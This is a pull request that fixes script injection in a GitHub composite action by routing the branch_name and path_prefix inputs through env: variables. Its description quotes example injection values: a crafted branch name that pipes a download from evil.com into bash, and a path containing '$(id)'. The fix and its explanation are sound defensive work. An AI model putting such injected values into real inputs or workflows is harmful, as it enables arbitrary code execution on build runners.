### PR TITLE
Fix: mitigate script injection via env: indirection for inputs

### DIFF
--- a/action.yaml
+++ b/action.yaml
@@ -42,10 +42,12 @@ runs:
     - name: 'Check path_prefix directory'
       if: inputs.path_prefix != '.'
       shell: bash
+      env:
+        INPUT_PATH_PREFIX: ${{ inputs.path_prefix }}
       run: |
-        if [ ! -d "${{ inputs.path_prefix }}" ]; then
+        if [ ! -d "$INPUT_PATH_PREFIX" ]; then
           echo 'Error: path_prefix is not a valid directory ❌'
-          echo "${{ inputs.path_prefix }}"
+          echo "$INPUT_PATH_PREFIX"
           exit 1
         fi
 
@@ -110,22 +112,27 @@ runs:
 
     - name: 'Validate linting configuration'
       shell: bash
+      env:
+        INPUT_PATH_PREFIX: ${{ inputs.path_prefix }}
+        INPUT_BRANCH_NAME: ${{ inputs.branch_name }}
       run: |
         # Validate linting configuration
-        if [ "${{ inputs.path_prefix }}" != '.' ]; then
-          cd "${{ inputs.path_prefix }}"
+        if [ "$INPUT_PATH_PREFIX" != '.' ]; then
+          cd "$INPUT_PATH_PREFIX"
         fi
-        if [ -n "${{ inputs.branch_name }}" ]; then
-          echo "Checking out Git branch: ${{ inputs.branch_name }} 💬"
-          git checkout -b "${{ inputs.branch_name }}"
+        if [ -n "$INPUT_BRANCH_NAME" ]; then
+          echo "Checking out Git branch: $INPUT_BRANCH_NAME 💬"
+          git checkout -b "$INPUT_BRANCH_NAME"
         fi
         pre-commit validate-config
 
     - name: 'Run all pre-commit hooks'
       shell: bash
+      env:
+        INPUT_PATH_PREFIX: ${{ inputs.path_prefix }}
       run: |
         # Run all pre-commit hooks
-        if [ "${{ inputs.path_prefix }}" != '.' ]; then
-          cd "${{ inputs.path_prefix }}"
+        if [ "$INPUT_PATH_PREFIX" != '.' ]; then
+          cd "$INPUT_PATH_PREFIX"
         fi
         pre-commit run -a


### PR DESCRIPTION
Security Findings: #17 (HIGH), #18 (MEDIUM)

Vulnerability Details:
- Finding #17 (HIGH, lines 118-120): inputs.branch_name was template-
  substituted directly into shell code including an echo and git
  checkout -b:
    echo "Checking out Git branch: ${{ inputs.branch_name }} 💬"
    git checkout -b "${{ inputs.branch_name }}"
  A branch name of '"; curl evil.com/shell | bash; "' executes the
  payload at template-expansion time on the echo line before git is
  even called. This is particularly dangerous as branch names come
  from external input (pull request heads).

- Finding #18 (MEDIUM, lines 46, 116): inputs.path_prefix was template-
  substituted directly into [ -d ] tests and cd commands:
    if [ ! -d "${{ inputs.path_prefix }}" ]; then
    cd "${{ inputs.path_prefix }}"
  A value containing '$(id)' executes during the directory check
  itself, before any path validation takes effect.

Remediation Applied:
- All shell steps that reference path_prefix and branch_name now use
  the 'env:' block pattern (INPUT_PATH_PREFIX, INPUT_BRANCH_NAME).
- Shell code references the environment variables instead of
  ${{ inputs.* }} template expressions.
- The first 'Check path_prefix directory' step and the two later steps
  ('Validate linting configuration', 'Run all pre-commit hooks') are
  all converted.

Impact:
- No behavioral change for legitimate callers.
- Eliminates arbitrary code execution via crafted branch names or
  path prefix values.

Reference: lfreleng-actions composite action security audit (2025-06)

Signed-off-by: Anil Belur <askb23@gmail.com>
Signed-off-by: Anil Belur <abelur@linuxfoundation.org>
